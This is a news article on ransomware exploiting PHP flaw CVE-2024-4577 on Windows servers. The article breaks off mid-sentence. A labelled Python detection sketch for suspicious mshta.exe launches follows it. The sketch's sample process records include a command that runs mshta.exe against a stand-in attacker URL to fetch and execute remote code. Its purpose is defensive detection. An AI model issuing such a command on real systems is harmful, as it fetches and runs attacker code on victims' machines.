Ransomware attackers are quickly exploiting a PHP vulnerability with a severity rating of 9.8.


Ransomware criminals have quickly weaponized an easy-to-exploit vulnerability in the PHP programming language that executes malicious code on web servers, security researchers said.

As of Thursday, Internet scans performed by security firm Censys had detected 1,000 servers infected by a ransomware strain known as TellYouThePass, down from 1,800 detected on Monday. The servers, mostly located in China, no longer display their usual content; instead, many list the site's file directory, which shows that all files have been given a .locked extension, indicating they have been encrypted. An accompanying ransom note demands roughly $6,500 in exchange for the decryption key.

[Image: The output of PHP servers infected by TellYouThePass ransomware. Credit: Censys]
[Image: The accompanying ransom note. Credit: Censys]
The vulnerability, tracked as CVE-2024-4577 and carrying a severity rating of 9.8 out of 10, stems from errors in the way PHP converts Unicode characters into ASCII. A feature built into Windows known as Best Fit allows attackers to use a technique known as argument injection to convert user-supplied input into characters that pass malicious commands to the main PHP application. Exploits allow attackers to bypass CVE-2012-1823, a critical code execution vulnerability patched in PHP in 2012.

CVE-2024-4577 affects PHP only when it runs in a mode known as CGI, in which a web server parses HTTP requests and passes them to a PHP script for processing. Even when PHP is not set to CGI mode, however, the vulnerability may still be exploitable when PHP executables such as php.exe and php-cgi.exe are in directories that are accessible by the web server. This configuration is extremely rare, with the exception of the XAMPP platform, which uses it by default. An additional requirement appears to be that the Windows locale, used to personalize the operating system to the local language of the user, must be set to either Chinese or Japanese.

The critical vulnerability was published on June 6, along with a security patch. Within 24 hours, threat actors were exploiting it to install TellYouThePass, researchers from security firm Imperva reported Monday. The exploits executed code that used the mshta.exe Windows binary to run an HTML application file hosted on an attacker-controlled server. Use of the binary indicated an approach known as living off the land, in which attackers use native operating system functional...
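
A detection sketch for the behaviour described above, added here as an example and not taken from Imperva, Censys or the original article: it flags mshta.exe processes that load a remote URL and descend, directly or through intermediate shells, from a web-server or PHP process. The event field names, the list of web-stack binaries and the sample records are constructed assumptions.

```python
import ntpath
import re

# Assumption: binaries that make up the web stack on the monitored host.
# php.exe and php-cgi.exe come from the article; httpd.exe is XAMPP's Apache.
WEB_STACK = {"httpd.exe", "php-cgi.exe", "php.exe"}
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation records (field names are hypothetical).
SAMPLE_EVENTS = [
    {"pid": 900, "ppid": 4, "image": r"C:\xampp\apache\bin\httpd.exe",
     "cmdline": "httpd.exe"},
    {"pid": 1200, "ppid": 900, "image": r"C:\xampp\php\php-cgi.exe",
     "cmdline": "php-cgi.exe"},
    {"pid": 1300, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c mshta.exe http://c2.example/a.hta"},
    {"pid": 1400, "ppid": 1300, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://c2.example/a.hta"},
    # Benign: user-launched mshta with a local file, and with an intranet URL.
    {"pid": 2000, "ppid": 1500, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 2100, "ppid": 2000, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Tools\report.hta"},
    {"pid": 2200, "ppid": 2000, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://intranet.example/help.hta"},
]

def basename(path):
    """Lower-cased file name of a Windows path, regardless of host OS."""
    return ntpath.basename(path).lower()

def find_suspicious_mshta(events):
    """Return (pid, web_ancestor, url) for each mshta.exe that loads a
    remote URL and has a web-stack process among its ancestors."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) != "mshta.exe":
            continue
        match = REMOTE_URL.search(e["cmdline"])
        if not match:
            continue
        # Walk up the parent chain; 'seen' guards against PID-reuse loops.
        seen, cur = set(), by_pid.get(e["ppid"])
        while cur and cur["pid"] not in seen:
            seen.add(cur["pid"])
            if basename(cur["image"]) in WEB_STACK:
                hits.append((e["pid"], basename(cur["image"]), match.group(0)))
                break
            cur = by_pid.get(cur["ppid"])
    return hits
```
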

